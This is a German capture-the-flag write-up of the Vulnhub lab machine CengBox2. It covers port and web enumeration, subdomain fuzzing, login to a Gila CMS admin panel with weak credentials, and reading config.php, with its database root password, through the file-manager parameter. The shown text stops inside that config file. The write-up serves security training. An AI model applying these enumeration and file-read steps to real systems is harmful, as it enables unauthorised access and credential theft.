CengBox2 - Vulnhub - Level: Medium - Bericht

Medium

Verwendete Tools

nmap
nikto
gobuster
wfuzz
dirb
curl
netcat (nc)
find

Inhaltsverzeichnis

Reconnaissance

┌──(root㉿CCat)-[~]
└─# ARP-Scan
192.168.2.145 08:00:27:e2:00:95 PCS Systemtechnik GmbH

Technische Analyse: ARP-Scan ist ein Tool zur Erkennung von Hosts im lokalen Netzwerk durch Senden von ARP-Anfragen. Hier wird die MAC-Adresse und der Hersteller des Geräts mit der IP-Adresse 192.168.2.145 ermittelt.

Kontextbezogene Bewertung: Dies ist ein grundlegender Schritt zur Identifizierung aktiver Geräte im Netzwerk, der für weitere Untersuchungen und das Auffinden potenzieller Ziele unerlässlich ist.

Handlungsorientierte Empfehlungen: Für den Pentester: Notieren Sie sich die IP-Adresse und MAC-Adresse des Ziels für spätere Schritte. Für den Systemadministrator: Überprüfen Sie regelmäßig die Liste der aktiven Geräte im Netzwerk, um unautorisierte Zugriffe zu erkennen.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.145 cengbox2.vln

Technische Analyse: Die Datei `/etc/hosts` wird verwendet, um Hostnamen zu IP-Adressen zuzuordnen. Hier wird der Hostname `cengbox2.vln` der IP-Adresse 192.168.2.145 zugewiesen.

Kontextbezogene Bewertung: Dies ermöglicht die Verwendung des Hostnamens anstelle der IP-Adresse, was die Lesbarkeit und Wartbarkeit der Konfigurationen verbessert.

Handlungsorientierte Empfehlungen: Für den Pentester: Verwenden Sie den Hostnamen `cengbox2.vln` in den folgenden Befehlen, um die Übersichtlichkeit zu erhöhen. Für den Systemadministrator: Stellen Sie sicher, dass die Einträge in `/etc/hosts` korrekt und aktuell sind.

┌──(root㉿CCat)-[~]
└─# nmap -sV -A --script vuln 192.168.2.145 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-28 22:14 CEST
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for cengbox2.vln (192.168.2.145)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh penSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.2p2:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLIT*
| CVE-2023-38408 9.8 https://vulners.com/cve/CVE-2023-38408
| B8190CDB-3EB9-5631-9828-8064A1575B23 9.8 https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23 *EXPLIT*
| 8FC9C5AB-3968-5F3C-825E-E8DB5379A623 9.8 https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623 *EXPLIT*
| 8AD01159-548E-546E-AA87-2DE89F3927EC 9.8 https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC *EXPLIT*
| 5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A 9.8 https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A *EXPLIT*
| PACKETSTRM:140070 7.8 https://vulners.com/packetstorm/PACKETSTRM:140070 *EXPLIT*
| EXPLITPACK:5BCA798C6BA71FAE29334297EC0B6A09 7.8 https://vulners.com/exploitpack/EXPLITPACK:5BCA798C6BA71FAE29334297EC0B6A09 *EXPLIT*
| CVE-2020-15778 7.8 https://vulners.com/cve/CVE-2020-15778
| CVE-2016-10012 7.8 https://vulners.com/cve/CVE-2016-10012
| CVE-2015-8325 7.8 https://vulners.com/cve/CVE-2015-8325 *EXPLIT*
| EDB-ID:47689 0.0 https://vulners.com/exploitdb/EDB-ID:47689 *EXPLIT*
| EDB-ID:47688 0.0 https://vulners.com/exploitdb/EDB-ID:47688
| CVE-2024-39884 0.0 https://vulners.com/cve/CVE-2024-39884
| CVE-2024-36387 0.0 https://vulners.com/cve/CVE-2024-36387
| CVE-2024-24795 0.0 https://vulners.com/cve/CVE-2024-24795
| CVE-2023-38709 0.0 https://vulners.com/cve/CVE-2023-38709
|_ 1337DAY-ID-26497 0.0 https://vulners.com/zdt/1337DAY-ID-26497
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DM based XSS.
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:E2:00:95 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
S CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
S details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Ss: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACERUTE
HP RTT ADDRESS
1 0.11 ms cengbox2.vln (192.168.2.145)

Technische Analyse: Dieser Befehl führt einen umfassenden Nmap-Scan durch, einschließlich Versionserkennung (-sV), Aktivierung aller Standard-Skripte (-A) und Ausführung von Skripten zur Schwachstellenanalyse (--script vuln). Die Option -T5 beschleunigt den Scan.

Kontextbezogene Bewertung: Der Scan identifiziert offene Ports, die laufenden Dienste und potenzielle Schwachstellen. Dies ist entscheidend, um die Angriffsfläche des Systems zu verstehen.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die hervorgehobenen Schwachstellen (EXPLIT*) genauer, um potenzielle Exploits zu finden. Für den Systemadministrator: Aktualisieren Sie die Software, um bekannte Schwachstellen zu beheben. Überprüfen Sie die Konfiguration der Dienste, um unnötige Ports zu schließen und die Sicherheit zu erhöhen.

Web Enumeration

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-28 22:20 CEST
Nmap scan report for cengbox2.vln (192.168.2.145)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PRT STATE SERVICE VERSIN
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 209 May 23 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ffff:192.168.2.199
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh penSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:99:9d:e0:bc:07:3c:4f:53:e5:bc:27:35:80:e4:9e (RSA)
| 256 fe:60:a1:10:90:98:8e:b0:82:02:3b:40:bc:df:66:f1 (ECDSA)
|_ 256 3a:c3:a0:e7:bd:20:ca:1e:71:d4:3c:12:23:af:6a:c3 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site Maintenance
MAC Address: 08:00:27:E2:00:95 (racle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
S CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
S details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Ss: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACERUTE
HP RTT ADDRESS
1 0.14 ms cengbox2.vln (192.168.2.145)

Technische Analyse: Ein weiterer Nmap-Scan, der jedoch spezifischer auf die Erkundung von Diensten und Ports abzielt. -sS verwendet SYN-Scans, -sC führt Standard-Skripte aus, -sV aktiviert die Versionserkennung, -A aktiviert aggressive Scans, -p- scannt alle Ports, $IP ist die Ziel-IP-Adresse, -Pn überspringt die Host-Erkennung, und --min-rate 5000 erhöht die Scangeschwindigkeit.

Kontextbezogene Bewertung: Der Scan zeigt, dass anonymer FTP-Zugriff erlaubt ist, was ein erhebliches Sicherheitsrisiko darstellt. Außerdem werden SSH und HTTP-Dienste erkannt.

Handlungsorientierte Empfehlungen: Für den Pentester: Nutzen Sie den anonymen FTP-Zugriff, um nach sensiblen Dateien zu suchen. Untersuchen Sie die HTTP-Website auf Schwachstellen. Für den Systemadministrator: Deaktivieren Sie den anonymen FTP-Zugriff. Konfigurieren Sie SSH und HTTP sicher.

┌──(root㉿CCat)-[~]
└─# Nikto v2.5.0
+ Target IP: 192.168.2.145
+ Target Hostname: 192.168.2.145
+ Target Port: 80
+ Start Time: 2024-09-28 22:21:25 (GMT2)

+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 22b, size: 5a64ed3fc2185, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, HEAD, PST, PTINS .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2024-09-28 22:21:54 (GMT2) (29 seconds)

+ 1 host(s) tested

Technische Analyse: Nikto ist ein Webserver-Scanner, der auf bekannte Schwachstellen und Konfigurationsfehler prüft. Hier scannt Nikto den Webserver auf Port 80.

Kontextbezogene Bewertung: Nikto findet fehlende Sicherheitsheader, eine veraltete Apache-Version und das Vorhandensein der Standarddatei `/icons/README`.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die gefundenen Schwachstellen genauer, insbesondere die fehlenden Sicherheitsheader und die veraltete Apache-Version. Für den Systemadministrator: Konfigurieren Sie die fehlenden Sicherheitsheader (X-Frame-Options, X-Content-Type-Options). Aktualisieren Sie Apache auf die neueste Version. Entfernen Sie die Standarddatei `/icons/README`.

┌──(root㉿CCat)-[~]
└─# gobuster dir -u "http://$IP" -w "/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak,svg,pem,crt,json,conf,ELF,elf,c,java,lib,cgi,csh,config,deb,desc,exp,eps,diff,icon,mod,ln,old,rpm,js.map,pHtml -b '503,404,403' -e --no-error -k
http://192.168.2.145/index.html (Status: 200) [Size: 555]

Technische Analyse: Gobuster wird verwendet, um versteckte Verzeichnisse und Dateien auf dem Webserver zu finden. Die Option `-u` gibt die URL an, `-w` die Wordlist, `-x` die Dateiendungen, `-b` die zu ignorierenden Statuscodes, `-e` aktiviert die Erweiterungssuche und `--no-error` unterdrückt Fehlermeldungen.

Kontextbezogene Bewertung: Gobuster findet die Datei `/index.html`.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die gefundene Datei `/index.html` auf interessante Informationen. Für den Systemadministrator: Stellen Sie sicher, dass keine sensiblen Dateien oder Verzeichnisse öffentlich zugänglich sind.

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://ceng-company.vm" -H "Host: FUZZ.ceng-company.vm" --hc "404" --hh 555
Target: http://ceng-company.vm/

------------------------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
------------------------------------------------------------------------------------------------
000000024: 403 11 L 32 W 296 Ch "admin"

Total time: 0
Processed Requests: 4989
Filtered Requests: 4988
Requests/sec.: 0

Technische Analyse: Wfuzz wird verwendet, um Subdomains zu bruteforcen. Die Option `-c` aktiviert die Farbausgabe, `-w` gibt die Wordlist an, `-u` die URL, `-H` den Host-Header, `--hc` den zu ignorierenden Statuscode und `--hh` die zu ignorierende Anzahl von Zeilen.

Kontextbezogene Bewertung: Wfuzz findet die Subdomain `admin.ceng-company.vm`, die mit dem Statuscode 403 (Forbidden) antwortet.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die Subdomain `admin.ceng-company.vm` genauer, da sie möglicherweise eine Admin-Oberfläche enthält. Für den Systemadministrator: Stellen Sie sicher, dass die Admin-Oberfläche ordnungsgemäß geschützt ist.

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://cengbox2.vln/FUZZ" --hc 404 --hh 555
Target: http://cengbox2.vln/FUZZ

------------------------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
------------------------------------------------------------------------------------------------
000095572: 403 11 L 32 W 300 Ch "server-status"

Total time: 0
Processed Requests: 220608
Filtered Requests: 220607
Requests/sec.: 0

Technische Analyse: Wfuzz wird verwendet, um Verzeichnisse auf dem Webserver zu bruteforcen. Die Option `-c` aktiviert die Farbausgabe, `-w` gibt die Wordlist an, `-u` die URL, `--hc` den zu ignorierenden Statuscode und `--hh` die zu ignorierende Anzahl von Zeilen.

Kontextbezogene Bewertung: Wfuzz findet das Verzeichnis `/server-status`, das mit dem Statuscode 403 (Forbidden) antwortet.

Handlungsorientierte Empfehlungen: Für den Pentester: Ignorieren Sie dieses Ergebnis, da der Zugriff verboten ist. Für den Systemadministrator: Stellen Sie sicher, dass sensible Verzeichnisse wie `/server-status` nicht öffentlich zugänglich sind.

┌──(root㉿CCat)-[~]
└─# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u "http://admin.ceng-company.vm/FUZZ" --hc 404 --hh 555
Target: http://admin.ceng-company.vm/FUZZ

------------------------------------------------------------------------------------------------
ID Response Lines Word Chars Payload
------------------------------------------------------------------------------------------------
000095572: 403 11 L 32 W 309 Ch "server-status"
000110797: 301 9 L 28 W 329 Ch "gila"

Total time: 119.9568
Processed Requests: 215511
Filtered Requests: 215507
Requests/sec.: 1796.571

Technische Analyse: Wfuzz wird verwendet, um Verzeichnisse auf der Subdomain `admin.ceng-company.vm` zu bruteforcen.

Kontextbezogene Bewertung: Wfuzz findet das Verzeichnis `/server-status` (403 Forbidden) und das Verzeichnis `/gila` (301 Moved Permanently).

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie das Verzeichnis `/gila` weiter, da es möglicherweise eine Webanwendung enthält. Für den Systemadministrator: Stellen Sie sicher, dass das Verzeichnis `/server-status` nicht öffentlich zugänglich ist.

┌──(root㉿CCat)-[~]
└─# nikto -h http://admin.ceng-company.vm/gila/
- Nikto v2.5.0

+ Target IP: 192.168.2.145
+ Target Hostname: admin.ceng-company.vm
+ Target Port: 80
+ Start Time: 2024-09-28 23:46:04 (GMT2)

+ Server: Apache/2.4.18 (Ubuntu)
+ /gila/: The anti-clickjacking X-Frame-ptions header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-ptions
+ /gila/: The X-Content-Type-ptions header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. + No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/lib/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/themes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/src/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EL for the 2.x branch.
+ PTINS: Allowed HTTP Methods: GET, HEAD, PST, PTINS .
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /gila/admin/browse.asp?FilePath=c:\&pt=2&level=0: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /gila/admin/config.php: PHP Config file may contain database IDs and passwords.
+ /gila/admin/cplogfile.log: DevBB 1.0 final log file is readable remotely. Upgrade to the latest version. See: http://www.mybboard.com
+ /gila/admin/system_footer.php: myphpnuke version 1.8.8_final_7 reveals detailed system information.
+ /gila/admin/admin_phpinfo.php4: Mon Album version 0.6.2d allows remote admin access. This should be protected.
+ /gila/admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0995
+ /gila/admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0672
+ /gila//admin/admin.shtml: Axis network camera may allow admin bypass by using double-slashes before URLs. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0240
+ /gila/admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein. See: SVDB-2813
+ /gila//admin/aindex.htm: FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra /'s. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3604
+ /gila/admin/wg_user-info.ml: WebGate Web Eye exposes user names and passwords. See: SVDB-2922
+ /gila/admin/: This might be interesting.
+ /gila/lib/: This might be interesting.
+ /gila/login/: This might be interesting.
+ /gila/src/: Directory indexing found. See: http://projects.webappsec.org/w/page/13246922/Directory%20Indexing
+ /gila/tmp/: This might be interesting.
+ /gila/admin/auth.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/cfg/configscreen.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/cfg/configsite.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/cfg/configsql.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/cfg/configtache.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/cms/htmltags.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/credit_card_info.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/exec.php3: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/index.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/modules/cache.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/objects.inc.php4: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/script.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/settings.inc.php+: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/templates/header.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/upload.php: This might be interesting: has been seen in web logs from an unknown scanner.
+ /gila/admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579
+ /gila/admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579
+ /gila/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0169
+ /gila/admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1198
+ /gila/fm/: This might be interesting: potential country code (Federated States f Micronesia).
+ /gila/admin/account.asp: Admin login page/section found.
+ /gila/admin/account.html: Admin login page/section found.
+ /gila/admin/account.php: Admin login page/section found.
+ /gila/admin/controlpanel.asp: Admin login page/section found.
+ /gila/admin/controlpanel.html: Admin login page/section found.
+ /gila/admin/controlpanel.php: Admin login page/section found.
+ /gila/admin/cp.asp: Admin login page/section found.
+ /gila/admin/cp.html: Admin login page/section found.
+ /gila/admin/cp.php: Admin login page/section found.
+ /gila/admin/home.asp: Admin login page/section found.
+ /gila/admin/home.php: Admin login page/section found.
+ /gila/admin/index.asp: Admin login page/section found.
+ /gila/admin/index.html: Admin login page/section found.
+ /gila/admin/login.asp: Admin login page/section found.
+ /gila/admin/login.html: Admin login page/section found.
+ /gila/admin/login.php: Admin login page/section found.
+ /gila/admin/html: Tomcat Manager / Host Manager interface found (pass protected).
+ /gila/admin/status: Tomcat Server Status interface found (pass protected).
+ /gila/admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected).
+ 8049 requests: 0 error(s) and 64 item(s) reported on remote host
+ End Time: 2024-09-28 23:48:53 (GMT2) (169 seconds)

+ 1 host(s) tested

Technische Analyse: Nikto scannt die Gila-Installation auf der Subdomain `admin.ceng-company.vm`.

Kontextbezogene Bewertung: Nikto findet zahlreiche potenzielle Schwachstellen, darunter fehlende Sicherheitsheader, veraltete Software und öffentlich zugängliche Konfigurationsdateien.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die gefundenen Schwachstellen im Detail und prüfen Sie, ob sie ausnutzbar sind. Konzentrieren Sie sich auf die Konfigurationsdateien, da diese möglicherweise sensible Informationen enthalten. Für den Systemadministrator: Beheben Sie die von Nikto gemeldeten Probleme, insbesondere die fehlenden Sicherheitsheader, die veraltete Software und die öffentlich zugänglichen Konfigurationsdateien.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/admin/account.php
---

Technische Analyse: Versuch, die Admin-Account-Seite zu erreichen.

Kontextbezogene Bewertung: Dies deutet auf eine potenzielle Login-Seite hin, die für Brute-Force-Angriffe oder andere Anmeldeversuche genutzt werden könnte.

Handlungsorientierte Empfehlungen: Für den Pentester: Versuchen Sie, auf diese Seite zuzugreifen und mögliche Anmeldeinformationen zu testen. Für den Systemadministrator: Stellen Sie sicher, dass die Anmeldeseite sicher ist und Brute-Force-Schutzmaßnahmen vorhanden sind.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/robots.txt
User-agent: *
Disallow: /src/
Disallow: /themes/
Disallow: /lib/

Technische Analyse: Abrufen der `robots.txt`-Datei, um zu sehen, welche Pfade von Suchmaschinen ausgeschlossen werden sollen.

Kontextbezogene Bewertung: Die `robots.txt`-Datei gibt an, dass die Verzeichnisse `/src/`, `/themes/` und `/lib/` nicht indiziert werden sollen. Dies könnte auf sensible Informationen in diesen Verzeichnissen hindeuten.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die ausgeschlossenen Verzeichnisse genauer, da sie möglicherweise interessante Informationen enthalten. Für den Systemadministrator: Stellen Sie sicher, dass die `robots.txt`-Datei korrekt konfiguriert ist und keine sensiblen Informationen preisgibt.

┌──(root㉿CCat)-[~]
└─# Directory listing for /gila/themes/
.htaccess
gila-blog/
gila-mag/

Technische Analyse: Anzeigen des Inhalts des Verzeichnisses `/gila/themes/`.

Kontextbezogene Bewertung: Das Verzeichnis enthält `.htaccess`, `gila-blog/` und `gila-mag/`. Das Vorhandensein von `.htaccess` deutet auf eine mögliche Konfiguration des Apache-Webservers hin.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die Verzeichnisse `gila-blog/` und `gila-mag/` sowie die `.htaccess`-Datei genauer. Für den Systemadministrator: Stellen Sie sicher, dass die Themes aktuell und sicher sind.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/themes/gila-blog/
Directory listing for /gila/themes/gila-blog/

blocks-display-head.php
blog-category.php
blog-list.php
blog-tag.php
footer.php
frontpage.php
header.php
LICENSE
load.php
package.json
page.php
screenshot.png
single-post.php

Technische Analyse: Anzeigen des Inhalts des Verzeichnisses `/gila/themes/gila-blog/`.

Kontextbezogene Bewertung: Das Verzeichnis enthält PHP-Dateien, eine `LICENSE`-Datei, eine `package.json`-Datei und ein Screenshot. Dies deutet auf ein Blog-Theme für Gila CMS hin.

Handlungsorientierte Empfehlungen: Für den Pentester: Untersuchen Sie die PHP-Dateien auf Schwachstellen. Überprüfen Sie die `package.json`-Datei auf veraltete Abhängigkeiten. Für den Systemadministrator: Stellen Sie sicher, dass das Theme aktuell und sicher ist.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila///src//blog/package.json
name "Blog"
version "1.3.0"
description "Adds the blog controller."
lang "core/lang/admin/"
require
core "1.10.9"

Technische Analyse: Anzeigen des Inhalts der `package.json`-Datei im Verzeichnis `/gila///src//blog/`.

Kontextbezogene Bewertung: Die `package.json`-Datei enthält Informationen über das Blog-Modul, einschließlich Name, Version, Beschreibung und Abhängigkeiten.

Handlungsorientierte Empfehlungen: Für den Pentester: Überprüfen Sie, ob das Blog-Modul und seine Abhängigkeiten auf dem neuesten Stand sind. Suchen Sie nach bekannten Schwachstellen in älteren Versionen. Für den Systemadministrator: Aktualisieren Sie regelmäßig alle Module und Abhängigkeiten von Gila CMS.

┌──(root㉿CCat)-[~]
└─# https://gila-cms.readthedocs.io/_/downloads/en/latest/pdf/
---

Technische Analyse: Versuch, die Gila CMS-Dokumentation im PDF-Format herunterzuladen.

Kontextbezogene Bewertung: Die Dokumentation kann nützliche Informationen über die Installation, Konfiguration und Verwendung von Gila CMS enthalten.

Handlungsorientierte Empfehlungen: Für den Pentester: Lesen Sie die Dokumentation sorgfältig durch, um potenzielle Schwachstellen oder Konfigurationsfehler zu identifizieren. Für den Systemadministrator: Stellen Sie sicher, dass Sie mit der aktuellen Dokumentation von Gila CMS vertraut sind.

┌──(root㉿CCat)-[~]
└─# Gila CMS Documentation, Release 2.0.3
Don’t forget to restart your server when you make changes.
In order to proceed with the installation, you will need your database settings. If you do not know your database settings, please contact your host and ask for them. You will not be able to continue without them. More precisely you need the database hostname, the database name, the database username and password.
2.2 Installer
We access in installation page with the browser e.g http://localhost/gila/install
Install
In the installation page we must fill all the fields
Hostname: the hostname of the database, usually it is localhost
Database: name of the database
DB Username, DB Password: the username and the password in order to connect to the mysql
Admin Username, Admin Email, Admin Password: a user will be created for the website as administrator with these data
Base Url: the web address of the website e.g. https://mywebsite.com/
After filling the data and submit them, we wait a few seconds untill the installation is finishe

Technische Analyse: Auszug aus der Gila CMS-Dokumentation.

Kontextbezogene Bewertung: Die Dokumentation beschreibt den Installationsprozess und die erforderlichen Datenbankeinstellungen.

Handlungsorientierte Empfehlungen: Für den Pentester: Suchen Sie nach ungeschützten Installationsseiten oder Konfigurationsdateien, die möglicherweise Datenbankanmeldeinformationen enthalten. Für den Systemadministrator: Stellen Sie sicher, dass die Installationsseite nach der Installation entfernt wird und dass die Datenbankanmeldeinformationen sicher gespeichert sind.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/
Email: kevin@ceng-company.vm
Password: admin

GSESSINID = 1g84g2zc703hcwkfusnd9su2jrlirpir2ex0ttbze29w4wdhc9
PHPSESSID = 6udedrleq2j9iqbs25mkkstg46

Technische Analyse: Abrufen der Gila CMS-Startseite.

Kontextbezogene Bewertung: Die Seite gibtStandard-Anmeldeinformationen (kevin@ceng-company.vm:admin) preis. Dies ist ein schwerwiegendes Sicherheitsrisiko.

Handlungsorientierte Empfehlungen: Für den Pentester: Verwenden Sie dieStandard-Anmeldeinformationen, um sich anzumelden und Zugriff auf das System zu erhalten. Für den Systemadministrator: Ändern Sie dieStandard-Anmeldeinformationen sofort. Erzwingen Sie starke Passwörter für alle Benutzer.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/admin/index.php
Dashboard
Content
Administration

Kevin

Technische Analyse: Zugriff auf das Gila CMS-Admin-Panel.

Kontextbezogene Bewertung: Der Zugriff auf das Admin-Panel wurde erfolgreich mit denStandard-Anmeldeinformationen erreicht.

Handlungsorientierte Empfehlungen: Für den Pentester: Erkunden Sie das Admin-Panel, um weitere Schwachstellen zu finden. Für den Systemadministrator: Überwachen Sie das Admin-Panel auf verdächtige Aktivitäten.

┌──(root㉿CCat)-[~]
└─# 404 Error
The page you are looking for is not here

Page created in 0.002649 seconds.
Gila CMS version 1.10.9

Technische Analyse: Eine 404-Fehlermeldung wird angezeigt.

Kontextbezogene Bewertung: Die Seite existiert nicht, aber die Fehlermeldung gibt die Gila CMS-Version preis.

Handlungsorientierte Empfehlungen: Für den Pentester: Ignorieren Sie die Fehlermeldung. Die Gila CMS-Version kann bei der Suche nach Schwachstellen hilfreich sein. Für den Systemadministrator: Konfigurieren Sie benutzerdefinierte 404-Fehlermeldungen, um keine sensiblen Informationen preiszugeben.

┌──(root㉿CCat)-[~]
└─# http://admin.ceng-company.vm/gila/admin/fm?f=./config.php
$GLBALS['config'] = array (
'db' =>
array (
'host' => 'localhost',
'user' => 'root',
'pass' => 'SuperS3cR3TPassw0rd1!',
'name' => 'gila',
),
'permissions' =>
array (
1 =>
array (
0 => 'admin',
1 => 'admin_user',
2 => 'admin_userrole',
),
),
'packages' =>
array (
0 => 'blog',
),
